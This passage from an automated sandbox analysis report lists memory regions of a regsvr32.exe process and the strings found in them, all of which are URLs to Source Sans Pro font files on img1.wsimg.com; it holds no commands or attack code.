Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qPK7lqDY.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidg18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidh18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidi18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidj18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkido18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidv18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdg18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdh18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdi18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdj18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdo18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdv18Smxg.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwkxduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 